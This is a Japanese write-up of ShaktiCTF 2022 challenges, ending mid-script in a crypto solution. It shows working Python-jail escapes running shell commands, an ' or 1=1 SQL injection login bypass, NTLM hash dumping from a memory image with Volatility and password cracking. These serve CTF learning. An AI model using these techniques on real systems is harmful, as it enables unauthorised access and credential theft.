この大会は2022/12/9 23:30(JST)~2022/12/10 23:30(JST)に開催されました。
今回もチームで参戦。結果は4670点で387チーム中1位でした。
自分で解けた問題をWriteupとして書いておきます。
Cipher Puzzle (Misc 100)
モールス信号と推測し、https://morsecode.world/international/translator.htmlでデコードする。
01110101 01110010 01101001 01100111 01111010 01110111 01110011 01111010 01101000 01111011 00110101 01110010 00110100 01100111 00110111 01110111 01010011 00110000 01110110 01010001 00110000 01010000 00110101 00110011 01111101
CyberChefで以下のデコードを行う。
From Binary ・Delimiter: Space ・Byte Length: 8
urigzwszh{5r4g7wS0vQ0P53}
換字式暗号と推測できる。わかる範囲で対応表を書いてみる。
plain : abcdefghijklmnopqrstuvwxyz cipher: i s h rw g uz
cipherのg, h, iが4つ飛ばしで、対応づけられている。このことから対応表の穴を埋めてみる。
plain : abcdefghijklmnopqrstuvwxyz cipher: insxchmrwbglqvafkpuzejotyd
この対応表を使って復号する。
shaktictf{5h4k7iC0nM0R53}
level0 (Misc 100)
pyjailの問題。
$ nc 65.2.136.80 30212 Ever seen the movie 'Escape room'? Well, now you can play it yourself! ********************************************************* You are in a room with a door. Enter the password to open the door. Hint:Try using the tablet. ********************************************************* Player's Tablet Functions: 1. Run password cracker 2. Give up Enter your choice: 1 Password cracker is running... >>> print("".__class__.__mro__[1].__subclasses__()) [<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplementedType'>, <class 'traceback'>, <class 'super'>, <class 'range'>, <class 'dict'>, <class 'dict_keys'>, <class 'dict_values'>, <class 'dict_items'>, <class 'dict_reversekeyiterator'>, <class 'dict_reversevalueiterator'>, <class 'dict_reverseitemiterator'>, <class 'odict_iterator'>, <class 'set'>, <class 'str'>, <class 'slice'>, <class 'staticmethod'>, <class 'complex'>, <class 'float'>, <class 'frozenset'>, <class 'property'>, <class 'managedbuffer'>, <class 'memoryview'>, <class 'tuple'>, <class 'enumerate'>, <class 'reversed'>, <class 'stderrprinter'>, <class 'code'>, <class 'frame'>, <class 'builtin_function_or_method'>, <class 'method'>, <class 'function'>, <class 'mappingproxy'>, <class 'generator'>, <class 'getset_descriptor'>, <class 'wrapper_descriptor'>, <class 'method-wrapper'>, <class 'ellipsis'>, <class 'member_descriptor'>, <class 'types.SimpleNamespace'>, <class 'PyCapsule'>, <class 'longrange_iterator'>, <class 'cell'>, <class 'instancemethod'>, <class 'classmethod_descriptor'>, <class 'method_descriptor'>, <class 'callable_iterator'>, <class 'iterator'>, <class 'pickle.PickleBuffer'>, <class 'coroutine'>, <class 'coroutine_wrapper'>, <class 'InterpreterID'>, <class 'EncodingMap'>, <class 'fieldnameiterator'>, <class 'formatteriterator'>, <class 'BaseException'>, <class 'hamt'>, <class 'hamt_array_node'>, <class 'hamt_bitmap_node'>, <class 'hamt_collision_node'>, <class 'keys'>, <class 'values'>, <class 'items'>, <class 'Context'>, <class 'ContextVar'>, <class 'Token'>, <class 'Token.MISSING'>, <class 'moduledef'>, <class 'module'>, <class 'filter'>, <class 'map'>, <class 'zip'>, <class '_frozen_importlib._ModuleLock'>, <class '_frozen_importlib._DummyModuleLock'>, <class '_frozen_importlib._ModuleLockManager'>, <class '_frozen_importlib.ModuleSpec'>, <class '_frozen_importlib.BuiltinImporter'>, <class 'classmethod'>, <class '_frozen_importlib.FrozenImporter'>, <class '_frozen_importlib._ImportLockContext'>, <class '_thread._localdummy'>, <class '_thread._local'>, <class '_thread.lock'>, <class '_thread.RLock'>, <class '_io._IOBase'>, <class '_io._BytesIOBuffer'>, <class '_io.IncrementalNewlineDecoder'>, <class 'posix.ScandirIterator'>, <class 'posix.DirEntry'>, <class '_frozen_importlib_external.WindowsRegistryFinder'>, <class '_frozen_importlib_external._LoaderBasics'>, <class '_frozen_importlib_external.FileLoader'>, <class '_frozen_importlib_external._NamespacePath'>, <class '_frozen_importlib_external._NamespaceLoader'>, <class '_frozen_importlib_external.PathFinder'>, <class '_frozen_importlib_external.FileFinder'>, <class 'zipimport.zipimporter'>, <class 'zipimport._ZipImportResourceReader'>, <class 'codecs.Codec'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'codecs.StreamReaderWriter'>, <class 'codecs.StreamRecoder'>, <class '_abc_data'>, <class 'abc.ABC'>, <class 'dict_itemiterator'>, <class 'collections.abc.Hashable'>, <class 'collections.abc.Awaitable'>, <class 'collections.abc.AsyncIterable'>, <class 'async_generator'>, <class 'collections.abc.Iterable'>, <class 'bytes_iterator'>, <class 'bytearray_iterator'>, <class 'dict_keyiterator'>, <class 'dict_valueiterator'>, <class 'list_iterator'>, <class 'list_reverseiterator'>, <class 'range_iterator'>, <class 'set_iterator'>, <class 'str_iterator'>, <class 'tuple_iterator'>, <class 'collections.abc.Sized'>, <class 'collections.abc.Container'>, <class 'collections.abc.Callable'>, <class 'os._wrap_close'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class '_sitebuiltins._Helper'>] None *********************************************************
Player's Tablet Functions: 1. Run password cracker 2. Give up Enter your choice: 1 Password cracker is running... >>> "".__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['system']('ls -la') total 8 drwxr-xr-x 1 root root 17 Dec 10 00:58 . drwxr-xr-x 1 root root 17 Dec 10 00:58 .. -rwxr-xr-x 1 root root 0 Dec 10 00:58 .dockerenv lrwxrwxrwx 1 root root 7 Nov 30 02:04 bin -> usr/bin drwxr-xr-x 2 root root 6 Apr 15 2020 boot drwxr-xr-x 5 root root 360 Dec 10 00:58 dev drwxr-xr-x 1 root root 66 Dec 10 00:58 etc -rw-rw-rw- 1 root root 96 Dec 10 00:45 flag.txt drwxr-xr-x 2 root root 6 Apr 15 2020 home lrwxrwxrwx 1 root root 7 Nov 30 02:04 lib -> usr/lib lrwxrwxrwx 1 root root 9 Nov 30 02:04 lib32 -> usr/lib32 lrwxrwxrwx 1 root root 9 Nov 30 02:04 lib64 -> usr/lib64 lrwxrwxrwx 1 root root 10 Nov 30 02:04 libx32 -> usr/libx32 drwxr-xr-x 2 root root 6 Nov 30 02:04 media drwxr-xr-x 2 root root 6 Nov 30 02:04 mnt drwxr-xr-x 2 root root 6 Nov 30 02:04 opt dr-xr-xr-x 260 root root 0 Dec 10 00:58 proc -rw-rw-rw- 1 root root 1666 Dec 10 00:45 pyjail.py drwx------ 2 root root 37 Nov 30 02:07 root drwxr-xr-x 1 root root 21 Dec 10 00:58 run lrwxrwxrwx 1 root root 8 Nov 30 02:04 sbin -> usr/sbin drwxr-xr-x 2 root root 6 Nov 30 02:04 srv dr-xr-xr-x 13 root root 0 Dec 10 00:58 sys drwxrwxrwt 1 root root 6 Dec 10 00:47 tmp drwxr-xr-x 1 root root 81 Nov 30 02:04 usr drwxr-xr-x 1 root root 54 Nov 30 02:07 var None ********************************************************* Player's Tablet Functions: 1. Run password cracker 2. Give up Enter your choice: 1 Password cracker is running... >>> "".__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['system']('cat flag.txt') Congrats! You found the password. But the game ain't over..... shakti{7h47_w45_7Un!3a36rgjsk9}None *********************************************************
shakti{7h47_w45_7Un!3a36rgjsk9}
level1 (Misc)
再びpyjailの問題。
$ nc 65.2.136.80 30042 You may have gotten out of the first room, but you're not out of the woods yet. ********************************************************* This time, you find yourself in an corridor with an open door at the end. But then the door opens, and you find a hoard of robots coming your way. You need to find a way to stop them and get out of the corridor. And for that, you need the kill code. ********************************************************* Player's Tablet Functions: 1. Crack kill code 2. Give up Enter your choice: 1 Find the kill code... >>> ().__class__.__bases__[0].__subclasses__() [<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplementedType'>, <class 'traceback'>, <class 'super'>, <class 'range'>, <class 'dict'>, <class 'dict_keys'>, <class 'dict_values'>, <class 'dict_items'>, <class 'dict_reversekeyiterator'>, <class 'dict_reversevalueiterator'>, <class 'dict_reverseitemiterator'>, <class 'odict_iterator'>, <class 'set'>, <class 'str'>, <class 'slice'>, <class 'staticmethod'>, <class 'complex'>, <class 'float'>, <class 'frozenset'>, <class 'property'>, <class 'managedbuffer'>, <class 'memoryview'>, <class 'tuple'>, <class 'enumerate'>, <class 'reversed'>, <class 'stderrprinter'>, <class 'code'>, <class 'frame'>, <class 'builtin_function_or_method'>, <class 'method'>, <class 'function'>, <class 'mappingproxy'>, <class 'generator'>, <class 'getset_descriptor'>, <class 'wrapper_descriptor'>, <class 'method-wrapper'>, <class 'ellipsis'>, <class 'member_descriptor'>, <class 'types.SimpleNamespace'>, <class 'PyCapsule'>, <class 'longrange_iterator'>, <class 'cell'>, <class 'instancemethod'>, <class 'classmethod_descriptor'>, <class 'method_descriptor'>, <class 'callable_iterator'>, <class 'iterator'>, <class 'pickle.PickleBuffer'>, <class 'coroutine'>, <class 'coroutine_wrapper'>, <class 'InterpreterID'>, <class 'EncodingMap'>, <class 'fieldnameiterator'>, <class 'formatteriterator'>, <class 'BaseException'>, <class 'hamt'>, <class 'hamt_array_node'>, <class 'hamt_bitmap_node'>, <class 'hamt_collision_node'>, <class 'keys'>, <class 'values'>, <class 'items'>, <class 'Context'>, <class 'ContextVar'>, <class 'Token'>, <class 'Token.MISSING'>, <class 'moduledef'>, <class 'module'>, <class 'filter'>, <class 'map'>, <class 'zip'>, <class '_frozen_importlib._ModuleLock'>, <class '_frozen_importlib._DummyModuleLock'>, <class '_frozen_importlib._ModuleLockManager'>, <class '_frozen_importlib.ModuleSpec'>, <class '_frozen_importlib.BuiltinImporter'>, <class 'classmethod'>, <class '_frozen_importlib.FrozenImporter'>, <class '_frozen_importlib._ImportLockContext'>, <class '_thread._localdummy'>, <class '_thread._local'>, <class '_thread.lock'>, <class '_thread.RLock'>, <class '_io._IOBase'>, <class '_io._BytesIOBuffer'>, <class '_io.IncrementalNewlineDecoder'>, <class 'posix.ScandirIterator'>, <class 'posix.DirEntry'>, <class '_frozen_importlib_external.WindowsRegistryFinder'>, <class '_frozen_importlib_external._LoaderBasics'>, <class '_frozen_importlib_external.FileLoader'>, <class '_frozen_importlib_external._NamespacePath'>, <class '_frozen_importlib_external._NamespaceLoader'>, <class '_frozen_importlib_external.PathFinder'>, <class '_frozen_importlib_external.FileFinder'>, <class 'zipimport.zipimporter'>, <class 'zipimport._ZipImportResourceReader'>, <class 'codecs.Codec'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'codecs.StreamReaderWriter'>, <class 'codecs.StreamRecoder'>, <class '_abc_data'>, <class 'abc.ABC'>, <class 'dict_itemiterator'>, <class 'collections.abc.Hashable'>, <class 'collections.abc.Awaitable'>, <class 'collections.abc.AsyncIterable'>, <class 'async_generator'>, <class 'collections.abc.Iterable'>, <class 'bytes_iterator'>, <class 'bytearray_iterator'>, <class 'dict_keyiterator'>, <class 'dict_valueiterator'>, <class 'list_iterator'>, <class 'list_reverseiterator'>, <class 'range_iterator'>, <class 'set_iterator'>, <class 'str_iterator'>, <class 'tuple_iterator'>, <class 'collections.abc.Sized'>, <class 'collections.abc.Container'>, <class 'collections.abc.Callable'>, <class 'os._wrap_close'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class '_sitebuiltins._Helper'>] *********************************************************
Player's Tablet Functions: 1. Crack kill code 2. Give up Enter your choice: 1 Find the kill code... >>> ().__class__.__bases__[0].__subclasses__()[109].__init__.__globals__['sys'].modules['os'].system("ls") bin boot dev etc flag.txt home lib lib32 lib64 libx32 media mnt opt proc pyjail1.py root run sbin srv sys tmp usr var 0 ********************************************************* Player's Tablet Functions: 1. Crack kill code 2. Give up Enter your choice: 1 Find the kill code... >>> ().__class__.__bases__[0].__subclasses__()[109].__init__.__globals__['sys'].modules['os'].system("cat flag.txt") The robots stop at once.You are saved! But now you have to face the biggest challenge of all. Word of advice,remember this:weYbdk9012ghiwh=0? shakti{7h47_W45_4_Cl053_C4ll!!!}0
shakti{7h47_W45_4_Cl053_C4ll!!!}
Winter Reindeer (Misc 100)
スペースと、タブと、改行文字しかない。stegsnowで秘匿されていると推測。
さらにFreeのHintを見てみると、こう書いてある。
Hint #1 The name of the person is case sensitive. (Eg: Xxx Xxx)
このヒントから、問題に書かれているuniversal jointの発明者がパスワードになっていることが推測できる。調べてみると、"Gerolamo Cardano"がuniversal jointの発明者の一人であることがわかった。
$ stegsnow -C -Q -p "Gerolamo Cardano" snow_chall.txt shaktictf{H4v3_4_5n0wy_c7f}
shaktictf{H4v3_4_5n0wy_c7f}
L0g1n F4il3d (Web exploitation 100)
SQLインジェクション。以下を入力し、ログインすると、フラグが表示された。
Username: admin Password: ' or 1=1 -- -
Hey 'admin'! Here is your flag: '('admin', 'shaktictf{s1mpl3_sql_inject1on_ehehhehe564321345}')'.
shaktictf{s1mpl3_sql_inject1on_ehehhehe564321345}
Follow Up (Forensics 100)
WiresharkでTCP Streamを見ると、PNGフォーマットが見える。Raw(無加工)形式でPNGファイルとして保存すると、その画像にフラグが書いてあった。
shaktictf{that_was_e4sy!}
Fishy File (Forensics 100)
バイナリエディタで見ると、PDFフォーマットが逆順になっていることがわかるので、元に戻す。PDFには何も書かれていないように見えるが、全選択すると、何かが選択される。このままコピペする。
shaktictf{Th1s_I5_N0t_tH3_Fl4g!}
ダミーフラグだった。
$ binwalk flag.pdf DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 PDF document, version: "1.4" 197 0xC5 Zlib compressed data, default compression 872 0x368 Zlib compressed data, default compression 15901 0x3E1D Zlib compressed data, default compression 16699 0x413B PNG image, 1575 x 1179, 8-bit/color RGB, non-interlaced 16878 0x41EE Zlib compressed data, best compression 418797 0x663ED PDF document, version: "1.4" 418995 0x664B3 Zlib compressed data, default compression 421923 0x67023 Zlib compressed data, default compression 439080 0x6B328 Zlib compressed data, default compression 439616 0x6B540 Zlib compressed data, default compression 460624 0x70750 Zlib compressed data, default compression
PNGらしきものが埋め込まれているが、バイナリエディタで見ると、ところどころチャンク名が間違っているので、修正して抽出する。
IDHR -> IHDR idat -> IDAT INED -> IEND
#!/usr/bin/env python3 with open('shakti.dat', 'rb') as f: data = f.read() with open('flag.pdf', 'wb') as f: f.write(data[::-1]) data = data[::-1][16699:418797] data = data.replace(b'IDHR', b'IHDR') data = data.replace(b'idat', b'IDAT') data = data.replace(b'INED', b'IEND') with open('flag.png', 'wb') as f: f.write(data)
抽出したPNG画像にフラグが書いてあった。
shaktictf{Y0Uuu_G0t_Th1Ss5}
Mission 1 (Forensics 200)
メモリフォレンジックの問題。以下に答える必要がある。
1.What is the SHA1 hash of Challenge.raw? 2.What is the user password of TroubleMaker's account? 3.What is the PID of the program used to capture the image?
$ sha1sum Challenge.raw ed85ee47484e503787277807d3ef999586aecf1b Challenge.raw
Challenge.rawのsha1ハッシュは ed85ee47484e503787277807d3ef999586aecf1b。
$ volatility -f Challenge.raw imageinfo Volatility Foundation Volatility Framework 2.6 INFO : volatility.debug : Determining profile based on KDBG search... Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_23418 AS Layer1 : WindowsAMD64PagedMemory (Kernel AS) AS Layer2 : FileAddressSpace (/mnt/hgfs/Shared/work/Challenge.raw) PAE type : No PAE DTB : 0x187000L KDBG : 0xf8000282f120L Number of Processors : 1 Image Type (Service Pack) : 1 KPCR for CPU 0 : 0xfffff80002831000L KUSER_SHARED_DATA : 0xfffff78000000000L Image date and time : 2022-12-08 20:05:47 UTC+0000 Image local date and time : 2022-12-09 01:35:47 +0530 $ volatility -f Challenge.raw --profile=Win7SP1x64 pstree Volatility Foundation Volatility Framework 2.6 Name Pid PPid Thds Hnds Time -------------------------------------------------- ------ ------ ------ ------ ---- 0xfffffa80061bc660:wininit.exe 448 348 3 76 2022-12-08 19:58:37 UTC+0000 . 0xfffffa8006236b00:services.exe 512 448 9 208 2022-12-08 19:58:39 UTC+0000 .. 0xfffffa80068b0b00:wmpnetwk.exe 2176 512 14 431 2022-12-08 20:00:37 UTC+0000 .. 0xfffffa80066c1060:taskhost.exe 1676 512 9 215 2022-12-08 19:59:07 UTC+0000 .. 0xfffffa800634ab00:svchost.exe 912 512 18 482 2022-12-08 19:58:49 UTC+0000 .. 0xfffffa8005f7eb00:SearchIndexer. 1556 512 14 655 2022-12-08 20:00:15 UTC+0000 .. 0xfffffa8006551b00:svchost.exe 1312 512 10 148 2022-12-08 19:59:03 UTC+0000 .. 0xfffffa80037c0b00:svchost.exe 2416 512 11 356 2022-12-08 20:00:48 UTC+0000 .. 0xfffffa8003931b00:mscorsvw.exe 2064 512 6 84 2022-12-08 20:02:09 UTC+0000 .. 0xfffffa80062f6510:VBoxService.ex 680 512 13 125 2022-12-08 19:58:46 UTC+0000 .. 0xfffffa800637bb00:svchost.exe 940 512 32 922 2022-12-08 19:58:49 UTC+0000 .. 0xfffffa800632c060:svchost.exe 824 512 22 557 2022-12-08 19:58:47 UTC+0000 ... 0xfffffa80063be370:audiodg.exe 236 824 5 123 2022-12-08 19:58:51 UTC+0000 .. 0xfffffa80064ef9d0:spoolsv.exe 1184 512 14 290 2022-12-08 19:59:01 UTC+0000 .. 0xfffffa800650a860:svchost.exe 1220 512 19 316 2022-12-08 19:59:02 UTC+0000 .. 0xfffffa80062fab00:svchost.exe 736 512 7 266 2022-12-08 19:58:47 UTC+0000 .. 0xfffffa80065f3b00:sppsvc.exe 1896 512 4 143 2022-12-08 19:59:10 UTC+0000 .. 0xfffffa80062ba4f0:svchost.exe 620 512 9 351 2022-12-08 19:58:45 UTC+0000 ... 0xfffffa80039ef7b0:WmiPrvSE.exe 2508 620 7 112 2022-12-08 20:02:28 UTC+0000 .. 0xfffffa80063efb00:svchost.exe 368 512 14 465 2022-12-08 19:58:56 UTC+0000 .. 0xfffffa800636d460:svchost.exe 884 512 29 532 2022-12-08 19:58:49 UTC+0000 ... 0xfffffa8006721b00:dwm.exe 1484 884 3 99 2022-12-08 19:59:40 UTC+0000 .. 0xfffffa8006597b00:svchost.exe 1400 512 19 274 2022-12-08 19:59:03 UTC+0000 .. 0xfffffa8003b46060:svchost.exe 2172 512 9 249 2022-12-08 20:03:20 UTC+0000 .. 0xfffffa8003a827b0:mscorsvw.exe 2604 512 5 79 2022-12-08 20:02:37 UTC+0000 . 0xfffffa8006242930:lsass.exe 520 448 8 769 2022-12-08 19:58:40 UTC+0000 . 0xfffffa8005faeb00:lsm.exe 528 448 10 148 2022-12-08 19:58:40 UTC+0000 0xfffffa80047de060:csrss.exe 356 348 8 431 2022-12-08 19:58:33 UTC+0000 0xfffffa80036d0040:System 4 0 86 537 2022-12-08 19:58:23 UTC+0000 . 0xfffffa8004858040:smss.exe 272 4 2 29 2022-12-08 19:58:23 UTC+0000 0xfffffa80061abb00:csrss.exe 408 400 9 225 2022-12-08 19:58:37 UTC+0000 . 0xfffffa800654e060:conhost.exe 2628 408 2 53 2022-12-08 20:01:19 UTC+0000 . 0xfffffa8003ae1b00:conhost.exe 2012 408 2 52 2022-12-08 20:05:36 UTC+0000 0xfffffa80061ad4c0:winlogon.exe 440 400 3 113 2022-12-08 19:58:37 UTC+0000 0xfffffa80037ed3f0:explorer.exe 1452 1264 39 874 2022-12-08 19:59:41 UTC+0000 . 0xfffffa80067e9500:VBoxTray.exe 1060 1452 14 149 2022-12-08 19:59:47 UTC+0000 . 0xfffffa80038438f0:cmd.exe 2612 1452 1 21 2022-12-08 20:01:16 UTC+0000 . 0xfffffa8003798060:DumpIt.exe 636 1452 2 45 2022-12-08 20:05:34 UTC+0000 . 0xfffffa800388db00:iexplore.exe 2728 1452 10 486 2022-12-08 20:01:39 UTC+0000 .. 0xfffffa8003b23220:iexplore.exe 1076 2728 20 549 2022-12-08 20:03:37 UTC+0000
イメージのキャプチャのプログラムはDumpIt.exeで、そのPIDは 636。
$ volatility -f Challenge.raw --profile=Win7SP1x64 hivelist Volatility Foundation Volatility Framework 2.6 Virtual Physical Name ------------------ ------------------ ---- 0xfffff8a00127d010 0x00000000a147a010 \??\C:\Users\TroubleMaker\AppData\Local\Microsoft\Windows\UsrClass.dat 0xfffff8a0042f0410 0x000000007ea82410 \SystemRoot\System32\Config\DEFAULT 0xfffff8a00492f010 0x000000008bbe2010 \Device\HarddiskVolume1\Boot\BCD 0xfffff8a00000f010 0x00000000a976b010 [no name] 0xfffff8a000024010 0x00000000a97f6010 \REGISTRY\MACHINE\SYSTEM 0xfffff8a00004f010 0x00000000a96a1010 \REGISTRY\MACHINE\HARDWARE 0xfffff8a000bff010 0x000000008d0c6010 \SystemRoot\System32\Config\SOFTWARE 0xfffff8a000d18010 0x000000006a0eb010 \SystemRoot\System32\Config\SECURITY 0xfffff8a000d6b010 0x0000000061a85010 \SystemRoot\System32\Config\SAM 0xfffff8a000e31410 0x0000000057cfd410 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT 0xfffff8a000e81010 0x00000000574e0010 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT 0xfffff8a0011cc010 0x00000000a0f72010 \??\C:\Users\TroubleMaker\ntuser.dat $ volatility -f Challenge.raw --profile=Win7SP1x64 hashdump -y 0xfffff8a000024010 -s 0xfffff8a000d6b010 Volatility Foundation Volatility Framework 2.6 Administrator:500:aad3b435b51404eeaad3b435b51404ee:10eca58175d4228ece151e287086e824::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: TroubleMaker:1001:aad3b435b51404eeaad3b435b51404ee:8222c982da6adde81e54c0aeaac4dbed::: HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:94d88807b15429eb5d7e8f504f3499d1:::
CrackStationで 8222c982da6adde81e54c0aeaac4dbed をクラックする。
londonbridge
shaktictf{ed85ee47484e503787277807d3ef999586aecf1b_londonbridge_636}
Mission 2 (Forensics 300)
Mission 1の続き。TroubleMakerがリークしようとした機密情報は何かを答える問題。
$ volatility -f Challenge.raw --profile=Win7SP1x64 consoles Volatility Foundation Volatility Framework 2.6 ************************************************** ConsoleProcess: conhost.exe Pid: 2628 Console: 0xffd46200 CommandHistorySize: 50 HistoryBufferCount: 1 HistoryBufferMax: 4 OriginalTitle: Command Prompt Title: Command Prompt AttachedProcess: cmd.exe Pid: 2612 Handle: 0x60 ---- CommandHistory: 0x20ed90 Application: cmd.exe Flags: Allocated, Reset CommandCount: 7 LastAdded: 6 LastDisplayed: 2 FirstCommand: 0 CommandCountMax: 50 ProcessHandle: 0x60 Cmd #0 at 0x203740: cd Documents Cmd #1 at 0x1ed380: echo WW91IG1pZ2h0IG5lZWQgdGhpcyAtIHZpY3Rvcnk= Cmd #2 at 0x2139c0: type hint.txt Cmd #3 at 0x1ed3f0: echo WW91IG1pZ2h0IG5lZWQgdGhpcyAtIHZpY3Rvcnk= Cmd #4 at 0x2139f0: type hint.txt Cmd #5 at 0x1ed460: echo WW91IG1pZ2h0IG5lZWQgdGhpcyAtIHZpY3Rvcnk= Cmd #6 at 0x213a20: type hint.txt ---- Screen 0x1f12a0 X:80 Y:300 Dump: Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\TroubleMaker>cd Documents C:\Users\TroubleMaker\Documents>echo WW91IG1pZ2h0IG5lZWQgdGhpcyAtIHZpY3Rvcnk= WW91IG1pZ2h0IG5lZWQgdGhpcyAtIHZpY3Rvcnk= C:\Users\TroubleMaker\Documents>type hint.txt p4sSworD@51073#912 C:\Users\TroubleMaker\Documents>echo WW91IG1pZ2h0IG5lZWQgdGhpcyAtIHZpY3Rvcnk= WW91IG1pZ2h0IG5lZWQgdGhpcyAtIHZpY3Rvcnk= C:\Users\TroubleMaker\Documents>type hint.txt p4sSworD@51073#912 C:\Users\TroubleMaker\Documents>echo WW91IG1pZ2h0IG5lZWQgdGhpcyAtIHZpY3Rvcnk= WW91IG1pZ2h0IG5lZWQgdGhpcyAtIHZpY3Rvcnk= C:\Users\TroubleMaker\Documents>type hint.txt The system cannot find the file specified. C:\Users\TroubleMaker\Documents> ************************************************** ConsoleProcess: conhost.exe Pid: 2012 Console: 0xffd46200 CommandHistorySize: 50 HistoryBufferCount: 1 HistoryBufferMax: 4 OriginalTitle: C:\Users\TroubleMaker\Desktop\DumpIt\DumpIt.exe Title: C:\Users\TroubleMaker\Desktop\DumpIt\DumpIt.exe AttachedProcess: DumpIt.exe Pid: 636 Handle: 0x60 ---- CommandHistory: 0xbeba0 Application: DumpIt.exe Flags: Allocated CommandCount: 0 LastAdded: -1 LastDisplayed: -1 FirstCommand: 0 CommandCountMax: 50 ProcessHandle: 0x60 ---- Screen 0xa1190 X:80 Y:300 Dump: DumpIt - v1.3.2.20110401 - One click memory memory dumper Copyright (c) 2007 - 2011, Matthieu Suiche <http://www.msuiche.net> Copyright (c) 2010 - 2011, MoonSols <http://www.moonsols.com> Address space size: 4831838208 bytes ( 4608 Mb) Free space size: 14847827968 bytes ( 14159 Mb) * Destination = \??\C:\Users\TroubleMaker\Desktop\DumpIt\TROUBLEMAKER-PC-202 21208-200537.raw --> Are you sure you want to continue? [y/n] y + Processing...
base64文字列があるので、デコードする。
$ echo WW91IG1pZ2h0IG5lZWQgdGhpcyAtIHZpY3Rvcnk= | base64 -d You might need this - victory
これは、どこかで使うのか。一旦保留する。
$ volatility -f Challenge.raw --profile=Win7SP1x64 iehistory Volatility Foundation Volatility Framework 2.6 ************************************************** Process: 2728 iexplore.exe Cache type "DEST" at 0x51887eb Last modified: 2022-12-09 01:35:05 UTC+0000 Last accessed: 2022-12-08 20:05:05 UTC+0000 URL: TroubleMaker@https://pastebin.com/VPSQgu4v Title: Pastebin.com - Locked Paste
https://pastebin.com/VPSQgu4vにアクセスするが、パスワードが必要。先ほどのconsolesの結果で、hint.txtに以下のパスワードが書いてあることがわかっている。
p4sSworD@51073#912
このパスワードを入力すると、以下が表示された。
Are you looking for this? https://mega.nz/file/ImYVDIaK#PcatBviUVQVh1srQVjYYgMNg8ikOfOcQ1DYaA_YKwFQ
このURLにアクセスし、file.rarをダウンロードする。ダウンロードしたfile.rarはパスワードがかかっているので、John the Ripperでクラックする。
$ rar2john file.rar > hash.txt $ john --wordlist=dict/rockyou.txt hash.txt --rules Using default input encoding: UTF-8 Loaded 1 password hash (RAR5 [PBKDF2-SHA256 256/256 AVX2 8x]) Cost 1 (iteration count) is 32768 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status londonbridge (file.rar) 1g 0:00:02:18 DONE (2022-12-10 08:16) 0.007235g/s 765.4p/s 765.4c/s 765.4C/s lowrider13..locuas Use the "--show" option to display all of the cracked passwords reliably Session completed
パスワードは londonbridge であることがわかったので、解凍する。
$ unrar x -plondonbridge file.rar UNRAR 6.11 beta 1 freeware Copyright (c) 1993-2022 Alexander Roshal Extracting from file.rar Password of the RAR file is the password of TroubleMaker's account... Extracting flag.txt OK All OK $ cat flag.txt npcdhzaon{a4Rmp!_K1N5q0p_4vQfKkT1uA3R}
Vigenere暗号と推測して、https://www.dcode.fr/vigenere-cipherで復号する。ここで、consolesの結果にあったbase64文字列のデコード結果の"victory"を鍵として使う。
shaktictf{y4Yyy!_M1S5i0n_4cCoMpL1sH3D}
Eazy_peaZy (Crypto 50)
base64デコードして、バイトごとにASCIIコードで15プラスすれば復号できる。
#!/usr/bin/env python3 from base64 import * ct = b'ZFlSXGVaVGVXbFRjamFlIVAiZFBkZmEkY1BWUmtqampqampQWFQlJCNlYyYnWCVlYyYlbg==' flag = ''.join([chr(c + 15) for c in b64decode(ct)]) print(flag)
shaktictf{crypt0_1s_sup3r_eazyyyyyy_gc432tr56g4tr54}
secRets_And_seCReTs (Cryptography 100)
暗号化処理の概要は以下の通り。
・n: 既知の3つの数値の配列 ・c: 既知の3つの数値の配列 ・x % n[0] == c[0]が成り立つ。 ・x % n[1] == c[1]が成り立つ。 ・x % n[2] == c[2]が成り立つ。 ・secret: 既知固定値 ・e = 6553既知7 ・ct: 既知固定値 ・pow(ct, d, secret//x) == flagの数値化が成り立つ。
xはCRTで求めることができる。
n = secret // xとし、nをfactordbで素因数分解する。
n = 156613782007770984536049055700840395037085682399926189984796410929143868636172989598027406051641994725886674336805075334390044528511942285958708618671006005927130990180083143883853840126990685118290412751594654157367930730824790742241421921147161987915110899307344903473712967071752529319870067482601269289159 ** 2 = p ** 2
このとき、phiの値は以下のようになることに気を付け、あとは通常通りのRSAの復号を行う。
phi = p * (p - 1)
#!/usr/bin/env python3 from Crypto.Util.number import * from sympy.ntheory.modular import * n = [8722540009234070247614687250654407242443098960521889927638169603994447523278398949052234586867149142397946752296113268097476897402751079151430185069380019, 7748390830619438628598461672002256107736202041283980575594114738792667049612675190299231384130518428001436332199784230830361296805998178862622627821106411, 12992001107762284853924107072566691259373024612699267823574353409729296618405485466359139269067615966447864990530610158839653182793355847359198838835594411] c = [1411653708282913345423368557671871591664438381629501903851153161454445916121359905705692712233369895756996170441640578174610106571066191790012378520429743, 2861865990314714540093636102814256470323315183310888629544832686169355957218120916189696143602437816851535307621641620697566853687152831782355649417978952, 376492284239858752271882252381292364517711829294783943816555345285629896042539317245807593032505251819708007746820040182429681780320868266166620015593930] secret = 